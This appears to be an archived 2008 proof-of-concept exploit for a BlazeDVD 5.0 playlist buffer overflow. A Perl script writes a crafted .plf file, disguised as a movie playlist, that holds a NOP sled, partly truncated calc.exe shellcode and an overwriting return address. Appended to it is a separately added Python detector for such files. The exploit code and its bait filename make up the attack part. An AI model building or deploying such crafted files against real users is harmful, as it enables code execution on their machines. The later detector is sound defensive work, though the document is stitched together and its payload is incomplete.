BlazeDVD 5.0 - '.PLF' Playlist File Remote Buffer Overflow

Related Vulnerabilities: CVE-2006-6199  
Publish Date: 10 Aug 2008
Author: LiquidWorm

# Title: BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit (PoC)
# Summary: BlazeDVD is a leading, powerful and easy-to-use DVD player.
# It provides superior video and audio (Dolby) quality, together with other
# enhanced features, e.g. DVD recording, image and DV playback, bookmarks and image
# capture. Besides DVD, Video CD and Audio CD, BlazeDVD supports DIVX,
# MPEG4, RM, QuickTime, WMV, WMV-HD, Macromedia Flash and any other video file
# you have the codec installed for. The player is broadly compatible with
# hardware and runs stably and smoothly under Windows 98,
# 98SE, Me, 2000, XP and Vista.
# Product web Page:
# Desc: BlazeDVD 5.0 suffers from a buffer overflow vulnerability that can be
# exploited via a crafted PLF playlist file, locally and remotely. It fails to
# perform bounds checking on the user-supplied input file, allowing EIP to be
# overwritten and thus controlling the next instruction the software executes. After
# successful exploitation, calc.exe will be executed. Failed attempts will
# result in a Denial of Service (DoS).
# WinDbg (output):
#  - (4d8.f80): Access violation - code c0000005 (first chance)
#  - First chance exceptions are reported before any exception handling.
#  - This exception may be expected and handled.
#  - eax=00000001 ebx=77f6c15c ecx=04bd0ba8 edx=00000042 esi=01beffc0 edi=6405565c
#  - eip=41414141 esp=0012f188 ebp=01befcf8 iopl=0         nv up ei pl nz ac pe nc
#  - cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010216
#  - 41414141 ??              ???
# Tested on Microsoft Windows XP SP2 (English)
# Vulnerability discovered by: Parvez Anwar and Greg Linares
# Refs:
# -
# -
# -
# -
# -
# -
# Exploit coded by Gjoko 'LiquidWorm' Krstic
# 08.08.2008

print "\n|==================================================================|\n";
print "|                                                                  |\n";
print "|    BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit |\n";
print "|              by LiquidWorm <liquidworm [at]>           |\n";
print "|                                                                  |\n";
print "|==================================================================|\n\n";

$nop = "\x90" x 96;

# win32_exec EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub

$shellcode = "\x29\xc9\x83\xe9\xdd\xd9\xee"; # only the first bytes of the 164-byte payload survive in this copy; the remainder is not on the page

$ret = "\x78\x53\xbe\x01";

$payload = $nop.$shellcode.$ret;

open(my $plf, '>', './The_Dark_Knight.plf') or die "Cannot create playlist: $!";
binmode($plf); # write the payload bytes verbatim, without newline translation

print $plf $payload;
close($plf);

print "\n--> Playlist: The_Dark_Knight.plf successfully created...Enjoy!\n\n";

print "\n...t00t w00t!\n\a\n";

# August, 2008

# [2008-08-10]
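The advisory's description (an unbounded playlist entry that overwrites EIP) is the kind of thing a defender can triage for in incoming .plf files. The following Python is an added example, not part of the original PoC or of BlazeDVD: it treats a .plf as line-oriented text of media paths (an assumption), flags entries longer than Windows MAX_PATH, entries containing non-printable bytes, and runs of 0x90 NOP bytes, and is exercised on two constructed samples, one of which mirrors the PoC's 96 NOPs + 164 opaque bytes + 4-byte return address layout.

```python
import re
from dataclasses import dataclass

# Heuristic thresholds (assumptions for this example, not values from the advisory):
# a playlist entry is expected to be a file path, so anything longer than Windows
# MAX_PATH is suspect, and a long run of 0x90 (x86 NOP) bytes is never a media path.
MAX_ENTRY_LEN = 260
MIN_NOP_RUN = 16


@dataclass
class PlfFinding:
    line_no: int
    reason: str
    length: int


def scan_plf(data: bytes) -> list:
    """Triage the raw bytes of a .plf playlist and return one finding per
    indicator that an entry looks like an overflow attempt rather than a path."""
    findings = []
    for line_no, entry in enumerate(data.splitlines(), start=1):
        if len(entry) > MAX_ENTRY_LEN:
            findings.append(PlfFinding(line_no, "entry exceeds MAX_PATH", len(entry)))
        # Paths are printable text; shellcode and return addresses are not.
        if re.search(rb"[^\x09\x20-\x7e]", entry):
            findings.append(PlfFinding(line_no, "non-printable bytes in entry", len(entry)))
        nop_run = re.search(rb"\x90{%d,}" % MIN_NOP_RUN, entry)
        if nop_run:
            reason = "NOP sled of %d bytes" % len(nop_run.group())
            findings.append(PlfFinding(line_no, reason, len(entry)))
    return findings


def is_suspicious(data: bytes) -> bool:
    return bool(scan_plf(data))


# Constructed samples (not files from the advisory). CRAFTED_PLF copies only the
# PoC's layout: 96 NOPs, 164 placeholder bytes where the payload would sit, and
# four 0x41 bytes standing in for the overwritten EIP seen in the WinDbg output.
BENIGN_PLF = b"C:\\Movies\\trailer.mpg\r\nC:\\Movies\\feature.avi\r\n"
CRAFTED_PLF = b"\x90" * 96 + b"\xcc" * 164 + b"\x41" * 4

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_PLF), ("crafted", CRAFTED_PLF)):
        print(name, "->", [f.reason for f in scan_plf(sample)])
```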